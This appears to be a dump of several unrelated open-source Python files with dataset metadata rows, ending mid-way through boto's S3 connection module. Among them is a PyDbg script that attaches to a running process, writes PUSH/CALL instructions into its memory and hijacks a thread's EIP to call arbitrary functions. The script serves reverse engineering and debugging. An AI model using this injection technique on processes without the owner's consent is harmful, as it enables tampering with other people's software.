extended_attributes = get_interface_extended_attributes_from_idl(idl_file_contents)
# An interface property is produced for every non-callback interface
# that does not have [NoInterfaceObject].
# Callback interfaces with constants also have interface properties,
# but there are none of these in Blink.
# http://heycam.github.io/webidl/#es-interfaces
if (is_callback_interface_from_idl(idl_file_contents) or
'NoInterfaceObject' in extended_attributes):
return
# The [Exposed] extended attribute MUST take an identifier list. Each
# identifier in the list MUST be a global name. An interface or interface
# member the extended attribute applies to will be exposed only on objects
# associated with ECMAScript global environments whose global object
# implements an interface that has a matching global name.
exposed_global_names = extended_attributes.get('Exposed', 'Window').strip('()').split(',')
new_constructors_list = generate_global_constructors_list(interface_name, extended_attributes)
for exposed_global_name in exposed_global_names:
global_name_to_constructors[exposed_global_name].extend(new_constructors_list)
def generate_global_constructors_list(interface_name, extended_attributes):
extended_attributes_list = [
name + '=' + extended_attributes[name]
for name in 'Conditional', 'PerContextEnabled', 'RuntimeEnabled'
if name in extended_attributes]
if extended_attributes_list:
extended_string = '[%s] ' % ', '.join(extended_attributes_list)
else:
extended_string = ''
attribute_string = 'attribute {interface_name}Constructor {interface_name}'.format(interface_name=interface_name)
attributes_list = [extended_string + attribute_string]
# In addition to the usual interface property, for every [NamedConstructor]
# extended attribute on an interface, a corresponding property MUST exist
# on the ECMAScript global object.
# http://heycam.github.io/webidl/#NamedConstructor
if 'NamedConstructor' in extended_attributes:
named_constructor = extended_attributes['NamedConstructor']
# Extract function name, namely everything before opening '('
constructor_name = re.sub(r'\(.*', '', named_constructor)
# Note the reduplicated 'ConstructorConstructor'
# FIXME: rename to NamedConstructor
attribute_string = 'attribute %sConstructorConstructor %s' % (interface_name, constructor_name)
attributes_list.append(extended_string + attribute_string)
return attributes_list
def write_global_constructors_partial_interface(interface_name, idl_filename, constructor_attributes_list, only_if_changed):
# FIXME: replace this with a simple Jinja template
lines = (['partial interface %s {\n' % interface_name] +
[' %s;\n' % constructor_attribute
# FIXME: sort by interface name (not first by extended attributes)
for constructor_attribute in sorted(constructor_attributes_list)] +
['};\n'])
write_file(''.join(lines), idl_filename, only_if_changed)
header_filename = os.path.splitext(idl_filename)[0] + '.h'
idl_basename = os.path.basename(idl_filename)
write_file(HEADER_FORMAT.format(idl_basename=idl_basename),
header_filename, only_if_changed)
################################################################################
def main():
options, args = parse_options()
# Input IDL files are passed in a file, due to OS command line length
# limits. This is generated at GYP time, which is ok b/c files are static.
idl_files = read_file_to_list(options.idl_files_list)
# Output IDL files (to generate) are passed at the command line, since
# these are in the build directory, which is determined at build time, not
# GYP time.
# These are passed as pairs of GlobalObjectName, GlobalObject.idl
interface_name_idl_filename = [(args[i], args[i + 1])
for i in range(0, len(args), 2)]
with open(options.global_objects_file) as global_objects_file:
interface_name_to_global_names.update(pickle.load(global_objects_file))
for idl_filename in idl_files:
record_global_constructors(idl_filename)
# Check for [Exposed] / [Global] mismatch.
known_global_names = frozenset(itertools.chain.from_iterable(interface_name_to_global_names.values()))
exposed_global_names = frozenset(global_name_to_constructors)
if not exposed_global_names.issubset(known_global_names):
unknown_global_names = exposed_global_names.difference(known_global_names)
raise ValueError('The following global names were used in '
'[Exposed=xxx] but do not match any [Global] / '
'[PrimaryGlobal] interface: %s'
% list(unknown_global_names))
# Write partial interfaces containing constructor attributes for each
# global interface.
for interface_name, idl_filename in interface_name_idl_filename:
constructors = interface_name_to_constructors(interface_name)
write_global_constructors_partial_interface(
interface_name,
idl_filename,
constructors,
options.write_file_only_if_changed)
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause | 6,122,160,803,430,949,000 | 44.120879 | 199 | 0.700073 | false |
mborho/foafer | rdf/http.py | 1 | 3345 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# FOAFer
# Copyright (C) 2003, 2010, Martin Borho <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import re
from google.appengine.api import urlfetch
class http(object):
def __init__(self,uri=None):
self.user_agent = 'FOAFer.org'
self.detected = None
self.uri = uri
self.errors = []
pass
def load(self,uri=None):
rdf = None
if uri is not None:
self.uri = uri
if self.uri:
self.uri = re.sub(r'#.*$','',self.uri)
try:
headers = {'Cache-Control' : 'max-age=10','User-Agent': self.user_agent}
result = urlfetch.fetch(self.uri, headers = headers)#,'Accept':'application/rdf+xml'})
if result.status_code in [200,302,301]:
rdf = result.content
if not self.checkRDF(rdf):
self.errors.append('No Foaf-File found.')
return None
elif result.status_code in [404]:
self.errors.append('Response Code 404 - Document Not Found.')
else:
self.errors.append('File was not found.')
self.errors.append('Return Code: %d' % xml['status'])
except urlfetch.InvalidURLError,e:
self.errors.append("Invalid URL, only http and https is supported")
except urlfetch.DownloadError,e:
self.errors.append(unicode(e))
except urlfetch.ResponseTooLargeError,e:
self.errors.append("The response data exceeded the maximum allowed size.")
except Exception, e:
self.errors.append('%s: %s' % (e.__class__.__name__, e))
else:
self.errors.append('no uri given')
return rdf
def checkRDF(self,rdf):
rdf = re.sub(r'\s',' ', rdf)
pat = re.compile('<html.*<head',re.I)
if not pat.search(rdf) and re.search(r'http://xmlns.com/foaf/',rdf):
return True
else:
self.checkLink(rdf)
return False
def checkLink(self, string):
pat = re.compile(r'<link[^>]*rel=\"meta\"[^>]*>',re.I)
links = pat.findall(string)
links = [l for l in links if re.search(r'foaf',l,re.I) is not None]
if len(links) > 0:
pat = re.compile(r'href="([^"]*)"',re.I)
foaf = pat.findall(links[0])
if foaf and foaf[0].startswith('http'):
self.detected = foaf[0]
return True
else:
return False
| agpl-3.0 | 1,553,628,472,759,499,800 | 37.895349 | 102 | 0.553064 | false |
gigglearrows/anniesbot | alembic/versions/514f4b9bc74_added_columns_for_duel_win_lose_streaks_.py | 1 | 1069 | """Added columns for duel win/lose streaks in the tb_user_duel_stats table
Revision ID: 514f4b9bc74
Revises: 1d6dbeb93c9
Create Date: 2015-12-22 00:17:51.509756
"""
# revision identifiers, used by Alembic.
revision = '514f4b9bc74'
down_revision = '1d6dbeb93c9'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('tb_user_duel_stats', sa.Column('current_streak', sa.Integer(), nullable=False))
op.add_column('tb_user_duel_stats', sa.Column('longest_losestreak', sa.Integer(), nullable=False))
op.add_column('tb_user_duel_stats', sa.Column('longest_winstreak', sa.Integer(), nullable=False))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('tb_user_duel_stats', 'longest_winstreak')
op.drop_column('tb_user_duel_stats', 'longest_losestreak')
op.drop_column('tb_user_duel_stats', 'current_streak')
### end Alembic commands ###
| mit | 5,059,715,069,040,605,000 | 32.40625 | 102 | 0.703461 | false |
stevenmizuno/QGIS | python/plugins/processing/algs/grass7/ext/v_net_flow.py | 5 | 2124 | # -*- coding: utf-8 -*-
"""
***************************************************************************
v_net_flow.py
---------------------
Date : December 2015
Copyright : (C) 2015 by Médéric Ribreux
Email : medspx at medspx dot fr
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Médéric Ribreux'
__date__ = 'December 2015'
__copyright__ = '(C) 2015, Médéric Ribreux'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from .v_net import incorporatePoints, variableOutput
def checkParameterValuesBeforeExecuting(alg, parameters, context):
""" Verify if we have the right parameters """
params = [u'where', u'cats']
values = []
for param in params:
for i in [u'source', u'sink']:
values.append(
alg.parameterAsString(
parameters,
'{}_{}'.format(i, param),
context
)
)
if (values[0] or values[2]) and (values[1] or values[3]):
return None
return alg.tr("You need to set at least source/sink_where or source/sink_cats parameters for each set!")
def processCommand(alg, parameters, context):
incorporatePoints(alg, parameters, context)
def processOutputs(alg, parameters, context):
outputParameter = {'output': ['output', 'line', 1, True],
'cut': ['cut', 'line', 1, True]}
variableOutput(alg, outputParameter, parameters, context)
| gpl-2.0 | 4,885,700,446,181,923,000 | 34.898305 | 108 | 0.474032 | false |
googleapis/python-automl | samples/snippets/get_model_evaluation.py | 1 | 3697 | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def get_model_evaluation(project_id, model_id, model_evaluation_id):
"""Get model evaluation."""
# [START automl_language_entity_extraction_get_model_evaluation]
# [START automl_language_sentiment_analysis_get_model_evaluation]
# [START automl_language_text_classification_get_model_evaluation]
# [START automl_translate_get_model_evaluation]
# [START automl_vision_classification_get_model_evaluation]
# [START automl_vision_object_detection_get_model_evaluation]
from google.cloud import automl
# TODO(developer): Uncomment and set the following variables
# project_id = "YOUR_PROJECT_ID"
# model_id = "YOUR_MODEL_ID"
# model_evaluation_id = "YOUR_MODEL_EVALUATION_ID"
client = automl.AutoMlClient()
# Get the full path of the model evaluation.
model_path = client.model_path(project_id, "us-central1", model_id)
model_evaluation_full_id = f"{model_path}/modelEvaluations/{model_evaluation_id}"
# Get complete detail of the model evaluation.
response = client.get_model_evaluation(name=model_evaluation_full_id)
print("Model evaluation name: {}".format(response.name))
print("Model annotation spec id: {}".format(response.annotation_spec_id))
print("Create Time: {}".format(response.create_time))
print("Evaluation example count: {}".format(response.evaluated_example_count))
# [END automl_language_sentiment_analysis_get_model_evaluation]
# [END automl_language_text_classification_get_model_evaluation]
# [END automl_translate_get_model_evaluation]
# [END automl_vision_classification_get_model_evaluation]
# [END automl_vision_object_detection_get_model_evaluation]
print(
"Entity extraction model evaluation metrics: {}".format(
response.text_extraction_evaluation_metrics
)
)
# [END automl_language_entity_extraction_get_model_evaluation]
# [START automl_language_sentiment_analysis_get_model_evaluation]
print(
"Sentiment analysis model evaluation metrics: {}".format(
response.text_sentiment_evaluation_metrics
)
)
# [END automl_language_sentiment_analysis_get_model_evaluation]
# [START automl_language_text_classification_get_model_evaluation]
# [START automl_vision_classification_get_model_evaluation]
print(
"Classification model evaluation metrics: {}".format(
response.classification_evaluation_metrics
)
)
# [END automl_language_text_classification_get_model_evaluation]
# [END automl_vision_classification_get_model_evaluation]
# [START automl_translate_get_model_evaluation]
print(
"Translation model evaluation metrics: {}".format(
response.translation_evaluation_metrics
)
)
# [END automl_translate_get_model_evaluation]
# [START automl_vision_object_detection_get_model_evaluation]
print(
"Object detection model evaluation metrics: {}".format(
response.image_object_detection_evaluation_metrics
)
)
# [END automl_vision_object_detection_get_model_evaluation]
| apache-2.0 | -7,284,008,452,598,232,000 | 41.494253 | 85 | 0.711929 | false |
phracek/rebase-helper | rebasehelper/__init__.py | 1 | 1129 | # -*- coding: utf-8 -*-
#
# This tool helps you to rebase package to the latest version
# Copyright (C) 2013-2014 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Authors: Petr Hracek <[email protected]>
# Tomas Hozza <[email protected]>
import os
import pkg_resources
# make entry points accessible in case this package is not installed
parent_dir = os.path.dirname(os.path.dirname(__file__))
pkg_resources.working_set.add_entry(parent_dir)
| gpl-2.0 | 5,605,196,220,216,150,000 | 37.931034 | 73 | 0.750221 | false |
Alwnikrotikz/paimei | debuggee_procedure_call.py | 1 | 11874 | #!c:\python\python.exe
#
# PyDbg Debuggee Procedure Call Hack
# Copyright (C) 2006 Pedram Amini <[email protected]>
#
# $Id$
#
# This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with this program; if not, write to the Free
# Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
'''
@author: Pedram Amini
@license: GNU General Public License 2.0 or later
@contact: [email protected]
@organization: www.openrce.org
'''
import sys
import struct
import utils
from pydbg import *
from pydbg.defines import *
class __global:
def __repr__ (self):
rep = ""
for key, val in self.__dict__.items():
if type(val) is int:
rep += " %s: 0x%08x, %d\n" % (key, val, val)
else:
rep += " %s: %s\n" % (key, val)
return rep
allocations = [] # allocated (address, size) tuples.
cmd_num = 0 # keep track of executed commands.
glob = __global() # provide the user with a globally accessible persistent storage space.
saved_context = None # saved thread context prior to CALL insertion.
dbg = pydbg() # globally accessible pydbg instance.
container = None # address of memory allocated for instruction container.
# enable / disable logging here.
#log = lambda x: sys.stdout.write("> " + x + "\n")
log = lambda x: None
########################################################################################################################
def alloc (size):
'''
Convenience wrapper around pydbg.virtual_alloc() for easily allocation of read/write memory. This routine maintains
the global "allocations" table.
@type size: Long
@param size: Size of MEM_COMMIT / PAGE_READWRITE memory to allocate.
@rtype: DWORD
@return: Address of allocated memory.
'''
global dbg, allocations
if not size:
return
address = dbg.virtual_alloc(None, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
# make a record of the address/size tuple in the global allocations table.
allocations.append((address, size))
return address
########################################################################################################################
def handle_av (dbg):
'''
As we are mucking around with process state and calling potentially unknown subroutines, it is likely that we may
cause an access violation. We register this handler to provide some useful information about the cause.
'''
crash_bin = utils.crash_binning.crash_binning()
crash_bin.record_crash(dbg)
print crash_bin.crash_synopsis()
dbg.terminate_process()
########################################################################################################################
def handle_bp (dbg):
'''
This callback handler is responsible for establishing and maintaining the command-read loop. This handler seizes
control-flow at the first chance breakpoint.
At the command prompt, any Python statement can be executed. To store variables persistently across iterations over
this routine, use the "glob" global object shell. The built in commands include:
DONE, GO, G
For continuing the process. And for calling arbitrary procedures:
dpc(address, *args, **kwargs)
For more information, see the inline documentation for dpc(). Note: You *can not* directly assign the return value
from dpc(). You must explicitly assign Eax, example:
var = dpc(0xdeadbeef, "pedram") # INCORRECT
dpc(0xdeadbeef, "pedram") # CORRECT
var = dbg.context.Eax
@see: dpc()
'''
global allocations, cmd_num, saved_context, glob
log("breakpoint hit")
if not dbg.first_breakpoint:
# examine the return value.
ret = dbg.context.Eax
byte_ord = ret & 0xFF
status = "procedure call returned: %d 0x%08x" % (ret, ret)
deref = dbg.smart_dereference(ret, print_dots=False)
if byte_ord >= 32 and byte_ord <= 126:
status += " '%c'" % byte_ord
if deref != "N/A":
status += " -> %s" % deref
print status
# when we first get control, save the context of the thread we are about to muck around with.
if not saved_context:
saved_context = dbg.get_thread_context(dbg.h_thread)
# command loop.
while 1:
try:
command = raw_input("\n[%03d] CMD> " % cmd_num)
except:
return DBG_CONTINUE
if type(command) is str:
# cleanup and let the process continue execution.
if command.upper() in ["DONE", "GO", "G"]:
dbg.set_thread_context(saved_context)
free_all()
break
try:
exec(command)
cmd_num += 1
# implicit "GO" after dpc() commands.
if type(command) is str and command.lower().startswith("dpc"):
break
except:
sys.stderr.write("failed executing: '%s'.\n" % command)
log("continuing process")
return DBG_CONTINUE
########################################################################################################################
def free (address_to_free):
'''
Convenience wrapper around pydbg.virtual_free() for easily releasing allocated memory. This routine maintains
the global "allocations" table.
@type address: DWORD
@param address: Address of memory chunk to free.
'''
global dbg, allocations
for address, size in allocations:
if address == address_to_free:
dbg.virtual_free(address, size, MEM_DECOMMIT)
# remove the address/size tuple from the global allocations table.
allocations.remove((address, size))
########################################################################################################################
def free_all ():
'''
Free all entries in the global allocations table. Useful for when you have done a bunch of testing and want to
release all the allocated memory.
'''
global allocations
while len(allocations):
for address, size in allocations:
free(address)
########################################################################################################################
def dpc (address, *args, **kwargs):
'''
This routine is the real core of the script. Given an address and arguments it will allocate and initialize space
in the debuggee for storing the necessary instructions and arguments and then redirect EIP from the current thread
to the newly created instructions. A breakpoint is written after the assembled instruction set that is caught by
our breakpoint handler which re-prompts the user for further commands. Note: You *can not* directly assign the
return value from dpc(). You must explicitly assign Eax, example:
var = dpc(0xdeadbeef, "pedram") # INCORRECT
dpc(0xdeadbeef, "pedram") # CORRECT
var = dbg.context.Eax
@type address: DWORD
@param address: Address of procedure to call.
@type args: List
@param args: Arguments to pass to procedure.
@type kwargs: Dictionary (Keys can be one of EAX, EBX, ECX, EDX, ESI, EDI, ESP, EBP, EIP)
@param kwargs: Register values to set prior to calling procedure.
'''
global dbg, allocations, container
PUSH = "\x68"
CALL = "\xE8"
INT3 = "\xCC"
# XXX - freeing an address that bp_del is later trying to work on.
if container:
pass #free(container)
# allocate some space for our new instructions and update EIP to point into that new space.
container = eip = alloc(512)
dbg.context.Eip = eip
dbg.set_register("EIP", eip)
log("setting EIP of thread %d to 0x%08x" % (dbg.dbg.dwThreadId, eip))
# args are pushed in reverse order, make it a list and reverse it.
args = list(args)
args.reverse()
for arg in args:
log("processing argument: %s" % arg)
# if the argument is a string. allocate memory for the string, write it and set the arg to point to the string.
if type(arg) is str:
string_address = alloc(len(arg))
log(" allocated %d bytes for string at %08x" % (len(arg), string_address))
dbg.write(string_address, arg)
arg = string_address
# assemble and write the PUSH instruction.
assembled = PUSH + struct.pack("<L", arg)
log(" %08x: PUSH 0x%08x" % (eip, arg))
dbg.write(eip, assembled)
eip += len(assembled)
for reg, arg in kwargs.items():
log("processing register %s argument: %s" % (reg, arg))
if reg.upper() not in ("EAX", "EBX", "ECX", "EDX", "ESI", "EDI", "ESP", "EBP", "EIP"):
sys.stderr.write("> invalid register specified: %s\n" % reg)
continue
# if the argument is a string. allocate memory for the string, write it and set the arg to point to the string.
if type(arg) is str:
string_address = alloc(len(arg))
log(" allocated %d bytes for string at %08x" % (len(arg), string_address))
dbg.write(string_address, arg)
arg = string_address
# set the appropriate register to contain the argument value.
dbg.set_register(reg, arg)
# assemble and write the CALL instruction.
relative_address = (address - eip - 5) # -5 for the length of the CALL instruction
assembled = CALL + struct.pack("<L", relative_address)
log("%08x: CALL 0x%08x" % (eip, relative_address))
dbg.write(eip, assembled)
eip += len(assembled)
# set a breakpoint after the call.
log("setting breakpoint after CALL at %08x" % eip)
dbg.bp_set(eip, restore=False)
########################################################################################################################
def show_all ():
'''
Print a hex dump for all of the tracked allocations.
'''
global dbg, allocations
for address, size in allocations:
print dbg.hex_dump(dbg.read(address, size), address)
########################################################################################################################
if len(sys.argv) != 2:
sys.stderr.write("USAGE: debuggee_procedure_call.py <process name | pid>\n")
sys.exit(1)
dbg.set_callback(EXCEPTION_BREAKPOINT, handle_bp)
dbg.set_callback(EXCEPTION_ACCESS_VIOLATION, handle_av)
try:
pid = int(sys.argv[1])
found_target = True
except:
found_target = False
for (pid, proc_name) in dbg.enumerate_processes():
if proc_name.lower() == sys.argv[1]:
found_target = True
break
print "attaching to %d" % pid
if found_target:
dbg.attach(pid)
dbg.debug_event_loop()
else:
sys.stderr.write("target '%s' not found.\n" % sys.argv[1]) | gpl-2.0 | -7,953,247,128,727,441,000 | 33.450746 | 120 | 0.564679 | false |
darrenbilby/grr | lib/data_stores/mysql_advanced_data_store_test.py | 4 | 1560 | #!/usr/bin/env python
"""Tests the mysql data store."""
import unittest
import logging
from grr.lib import access_control
from grr.lib import data_store
from grr.lib import data_store_test
from grr.lib import flags
from grr.lib import test_lib
from grr.lib.data_stores import mysql_advanced_data_store
class MysqlAdvancedTestMixin(object):
def InitDatastore(self):
self.token = access_control.ACLToken(username="test",
reason="Running tests")
# Use separate tables for benchmarks / tests so they can be run in parallel.
with test_lib.ConfigOverrider({
"Mysql.database_name": "grr_test_%s" % self.__class__.__name__}):
try:
data_store.DB = mysql_advanced_data_store.MySQLAdvancedDataStore()
data_store.DB.flusher_thread.Stop()
data_store.DB.security_manager = test_lib.MockSecurityManager()
data_store.DB.RecreateTables()
except Exception as e:
logging.debug("Error while connecting to MySQL db: %s.", e)
raise unittest.SkipTest("Skipping since Mysql db is not reachable.")
def DestroyDatastore(self):
data_store.DB.DropTables()
def testCorrectDataStore(self):
self.assertTrue(
isinstance(data_store.DB,
mysql_advanced_data_store.MySQLAdvancedDataStore))
class MysqlAdvancedDataStoreTest(
MysqlAdvancedTestMixin, data_store_test._DataStoreTest):
"""Test the mysql data store abstraction."""
def main(args):
test_lib.main(args)
if __name__ == "__main__":
flags.StartMain(main)
| apache-2.0 | -1,940,198,993,024,092,400 | 29.588235 | 80 | 0.685256 | false |
ddzialak/boto | boto/s3/connection.py | 1 | 26258 | # Copyright (c) 2006-2012 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates.
# Copyright (c) 2010, Eucalyptus Systems, Inc.
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import xml.sax
import base64
from boto.compat import six, urllib
import time
from boto.auth import detect_potential_s3sigv4
import boto.utils
from boto.connection import AWSAuthConnection
from boto import handler
from boto.s3.bucket import Bucket
from boto.s3.key import Key
from boto.resultset import ResultSet
from boto.exception import BotoClientError, S3ResponseError
def check_lowercase_bucketname(n):
"""
Bucket names must not contain uppercase characters. We check for
this by appending a lowercase character and testing with islower().
Note this also covers cases like numeric bucket names with dashes.
>>> check_lowercase_bucketname("Aaaa")
Traceback (most recent call last):
...
BotoClientError: S3Error: Bucket names cannot contain upper-case
characters when using either the sub-domain or virtual hosting calling
format.
>>> check_lowercase_bucketname("1234-5678-9123")
True
>>> check_lowercase_bucketname("abcdefg1234")
True
"""
if not (n + 'a').islower():
raise BotoClientError("Bucket names cannot contain upper-case " \
"characters when using either the sub-domain or virtual " \
"hosting calling format.")
return True
def assert_case_insensitive(f):
def wrapper(*args, **kwargs):
if len(args) == 3 and check_lowercase_bucketname(args[2]):
pass
return f(*args, **kwargs)
return wrapper
class _CallingFormat(object):
def get_bucket_server(self, server, bucket):
return ''
def build_url_base(self, connection, protocol, server, bucket, key=''):
url_base = '%s://' % protocol
url_base += self.build_host(server, bucket)
url_base += connection.get_path(self.build_path_base(bucket, key))
return url_base
def build_host(self, server, bucket):
if bucket == '':
return server
else:
return self.get_bucket_server(server, bucket)
def build_auth_path(self, bucket, key=''):
key = boto.utils.get_utf8_value(key)
path = ''
if bucket != '':
path = '/' + bucket
return path + '/%s' % urllib.parse.quote(key)
def build_path_base(self, bucket, key=''):
key = boto.utils.get_utf8_value(key)
return '/%s' % urllib.parse.quote(key)
class SubdomainCallingFormat(_CallingFormat):
@assert_case_insensitive
def get_bucket_server(self, server, bucket):
return '%s.%s' % (bucket, server)
class VHostCallingFormat(_CallingFormat):
@assert_case_insensitive
def get_bucket_server(self, server, bucket):
return bucket
class OrdinaryCallingFormat(_CallingFormat):
def get_bucket_server(self, server, bucket):
return server
def build_path_base(self, bucket, key=''):
key = boto.utils.get_utf8_value(key)
path_base = '/'
if bucket:
path_base += "%s/" % bucket
return path_base + urllib.parse.quote(key)
class ProtocolIndependentOrdinaryCallingFormat(OrdinaryCallingFormat):
def build_url_base(self, connection, protocol, server, bucket, key=''):
url_base = '//'
url_base += self.build_host(server, bucket)
url_base += connection.get_path(self.build_path_base(bucket, key))
return url_base
class Location(object):
DEFAULT = '' # US Classic Region
EU = 'EU'
USWest = 'us-west-1'
USWest2 = 'us-west-2'
SAEast = 'sa-east-1'
APNortheast = 'ap-northeast-1'
APSoutheast = 'ap-southeast-1'
APSoutheast2 = 'ap-southeast-2'
CNNorth1 = 'cn-north-1'
class NoHostProvided(object):
# An identifying object to help determine whether the user provided a
# ``host`` or not. Never instantiated.
pass
class HostRequiredError(BotoClientError):
pass
class S3Connection(AWSAuthConnection):
DefaultHost = boto.config.get('s3', 'host', 's3.amazonaws.com')
DefaultCallingFormat = boto.config.get('s3', 'calling_format', 'boto.s3.connection.SubdomainCallingFormat')
QueryString = 'Signature=%s&Expires=%d&AWSAccessKeyId=%s'
def __init__(self, aws_access_key_id=None, aws_secret_access_key=None,
is_secure=True, port=None, proxy=None, proxy_port=None,
proxy_user=None, proxy_pass=None,
host=NoHostProvided, debug=0, https_connection_factory=None,
calling_format=DefaultCallingFormat, path='/',
provider='aws', bucket_class=Bucket, security_token=None,
suppress_consec_slashes=True, anon=False,
validate_certs=None, profile_name=None):
no_host_provided = False
if host is NoHostProvided:
no_host_provided = True
host = self.DefaultHost
if isinstance(calling_format, six.string_types):
calling_format=boto.utils.find_class(calling_format)()
self.calling_format = calling_format
self.bucket_class = bucket_class
self.anon = anon
super(S3Connection, self).__init__(host,
aws_access_key_id, aws_secret_access_key,
is_secure, port, proxy, proxy_port, proxy_user, proxy_pass,
debug=debug, https_connection_factory=https_connection_factory,
path=path, provider=provider, security_token=security_token,
suppress_consec_slashes=suppress_consec_slashes,
validate_certs=validate_certs, profile_name=profile_name)
# We need to delay until after the call to ``super`` before checking
# to see if SigV4 is in use.
if no_host_provided:
if 'hmac-v4-s3' in self._required_auth_capability():
raise HostRequiredError(
"When using SigV4, you must specify a 'host' parameter."
)
@detect_potential_s3sigv4
def _required_auth_capability(self):
if self.anon:
return ['anon']
else:
return ['s3']
def __iter__(self):
for bucket in self.get_all_buckets():
yield bucket
def __contains__(self, bucket_name):
return not (self.lookup(bucket_name) is None)
def set_bucket_class(self, bucket_class):
"""
Set the Bucket class associated with this bucket. By default, this
would be the boto.s3.key.Bucket class but if you want to subclass that
for some reason this allows you to associate your new class.
:type bucket_class: class
:param bucket_class: A subclass of Bucket that can be more specific
"""
self.bucket_class = bucket_class
def build_post_policy(self, expiration_time, conditions):
"""
Taken from the AWS book Python examples and modified for use with boto
"""
assert isinstance(expiration_time, time.struct_time), \
'Policy document must include a valid expiration Time object'
# Convert conditions object mappings to condition statements
return '{"expiration": "%s",\n"conditions": [%s]}' % \
(time.strftime(boto.utils.ISO8601, expiration_time), ",".join(conditions))
def build_post_form_args(self, bucket_name, key, expires_in=6000,
acl=None, success_action_redirect=None,
max_content_length=None,
http_method='http', fields=None,
conditions=None, storage_class='STANDARD',
server_side_encryption=None):
"""
Taken from the AWS book Python examples and modified for use with boto
This only returns the arguments required for the post form, not the
actual form. This does not return the file input field which also
needs to be added
:type bucket_name: string
:param bucket_name: Bucket to submit to
:type key: string
:param key: Key name, optionally add ${filename} to the end to
attach the submitted filename
:type expires_in: integer
:param expires_in: Time (in seconds) before this expires, defaults
to 6000
:type acl: string
:param acl: A canned ACL. One of:
* private
* public-read
* public-read-write
* authenticated-read
* bucket-owner-read
* bucket-owner-full-control
:type success_action_redirect: string
:param success_action_redirect: URL to redirect to on success
:type max_content_length: integer
:param max_content_length: Maximum size for this file
:type http_method: string
:param http_method: HTTP Method to use, "http" or "https"
:type storage_class: string
:param storage_class: Storage class to use for storing the object.
Valid values: STANDARD | REDUCED_REDUNDANCY
:type server_side_encryption: string
:param server_side_encryption: Specifies server-side encryption
algorithm to use when Amazon S3 creates an object.
Valid values: None | AES256
:rtype: dict
:return: A dictionary containing field names/values as well as
a url to POST to
.. code-block:: python
"""
if fields is None:
fields = []
if conditions is None:
conditions = []
expiration = time.gmtime(int(time.time() + expires_in))
# Generate policy document
conditions.append('{"bucket": "%s"}' % bucket_name)
if key.endswith("${filename}"):
conditions.append('["starts-with", "$key", "%s"]' % key[:-len("${filename}")])
else:
conditions.append('{"key": "%s"}' % key)
if acl:
conditions.append('{"acl": "%s"}' % acl)
fields.append({"name": "acl", "value": acl})
if success_action_redirect:
conditions.append('{"success_action_redirect": "%s"}' % success_action_redirect)
fields.append({"name": "success_action_redirect", "value": success_action_redirect})
if max_content_length:
conditions.append('["content-length-range", 0, %i]' % max_content_length)
if self.provider.security_token:
fields.append({'name': 'x-amz-security-token',
'value': self.provider.security_token})
conditions.append('{"x-amz-security-token": "%s"}' % self.provider.security_token)
if storage_class:
fields.append({'name': 'x-amz-storage-class',
'value': storage_class})
conditions.append('{"x-amz-storage-class": "%s"}' % storage_class)
if server_side_encryption:
fields.append({'name': 'x-amz-server-side-encryption',
'value': server_side_encryption})
